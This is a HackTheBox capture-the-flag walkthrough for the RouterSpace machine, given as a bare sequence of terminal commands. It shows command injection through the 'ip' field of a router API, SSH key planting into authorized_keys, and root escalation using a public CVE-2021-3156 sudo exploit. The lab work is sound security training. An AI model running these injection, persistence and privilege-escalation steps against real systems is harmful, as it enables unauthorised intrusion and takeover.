HackTheBox – RouterSpace Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.148
Click on download
┌──(root㉿kali)-[/home/kali/Downloads]
└─# file RouterSpace.apk
┌──(root㉿kali)-[/home/kali/Downloads]
└─# unzip RouterSpace.apk
┌──(root㉿kali)-[/home/kali/Downloads]
└─# apktool d RouterSpace.apk
Now scan the apk with mobsf.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.11.148
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo apt install anbox
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo modprobe ashmem_linux
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo modprobe binder_linux
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo /sbin/modprobe ashmem_linux
┌──(kali㉿kali)-[~/Downloads]└─$ wget https://build.anbox.io/android-images/2018/07/19/android_amd64.img
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo mv android_amd64.img /var/lib/anbox/android.img
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo service anbox-container-manager restart
┌──(kali㉿kali)-[~/Downloads]
└─$ anbox launch –package=org.anbox.appmgr –component=org.anbox.appmgr.AppViewActivity
┌──(root㉿kali)-[~kali/Downloads]
└─# apt install adb
┌──(root㉿kali)-[~kali/Downloads]
└─# adb devices
┌──(root㉿kali)-[~kali/Downloads]
└─# adb -s emulator-5558 install RouterSpace.apk
Now open
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 8000
┌──(kali㉿kali)-[~/Downloads]
└─$ adb shell settings put global http_proxy 10.10.14.102:8001
┌──(root㉿kali)-[~kali/Downloads]
└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent”
┌──(root㉿kali)-[~kali/Downloads]
└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent” -d ‘{“ip”:”127.0.0.1; whoami”}’
┌──(root㉿kali)-[~kali/Downloads]
└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent” -d ‘{“ip”:”127.0.0.1; cat /home/paul/user.txt”}’
┌──(root㉿kali)-[~kali/Downloads]
└─# cat /root/.ssh/id_rsa.pub
┌──(root㉿kali)-[~kali/Downloads]
└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent” -d ‘{“ip”:”127.0.0.1; echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCvP+2IenWNQ7HSl1woTSIVPw4OUquKtFcFzTvbnaWSih80RF7e6uI8B00G6aArS/4WLIPBbiXVDT9J0Dwe24Y0ppXKE/yCRRoAz3ND65/7bkLfWjlAx7nUPmQyIsIezBv1FXJLDjqs98l1Zuy0SYy8DhgJmZiuDkzoK2j8NuWDJTxLWGmhbtWtdGzPuAob/UvL/9sMBjKzN5KxWNsWDN7Xqr/YEmaBmBcw5TykWqjKj3wSoicERp39PhaujshS23csq1AMEcDMugni6CV4PNWW6bXhDAbc9KwyFBiqalAsoMxGgboL9FuuSdBaiYXNdy2o6DEaD9B55L2bFr21I5BpJ4vVvesomv6c32IUzseG35Q5ZZ4a4B28ezfKERBnr8PDkO1fvI9x6xynwWTmKBVjy/dCLXiiWz57kuwtMu5jGAWy7HTusTUQolrylC1ZhOgArEiVikFik5FtrXEDtFgKeXX2UCwsnd3fSVaKPN3jQXKNmG8F+pHb62arye8y0M= root@kali > /home/paul/.ssh/authorized_keys”}’
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh -i /root/.ssh/id_rsa paul@routerspace.htb
https://github.com/mzet-/linux-exploit-suggester
┌──(root㉿kali)-[~kali/Downloads/linux-exploit-suggester]
└─# scp -i /root/.ssh/id_rsa linux-exploit-suggester.sh paul@routerspace.htb:/tmp
paul@routerspace:/tmp$ ./linux-exploit-suggester.sh
paul@routerspace:/tmp$ sudo –version
https://github.com/CptGibbon/CVE-2021-3156
┌──(root㉿kali)-[~kali/Downloads]
└─# git clone https://github.com/CptGibbon/CVE-2021-3156
┌──(root㉿kali)-[~kali/Downloads/CVE-2021-3156]
└─# scp -i /root/.ssh/id_rsa /home/kali/Downloads/CVE-2021-3156/* paul@routerspace.htb:/tmp
paul@routerspace:/tmp$ make
paul@routerspace:/tmp$ chmod 777 exploit
paul@routerspace:/tmp$ ./exploit
# cd /root
# cat root.txt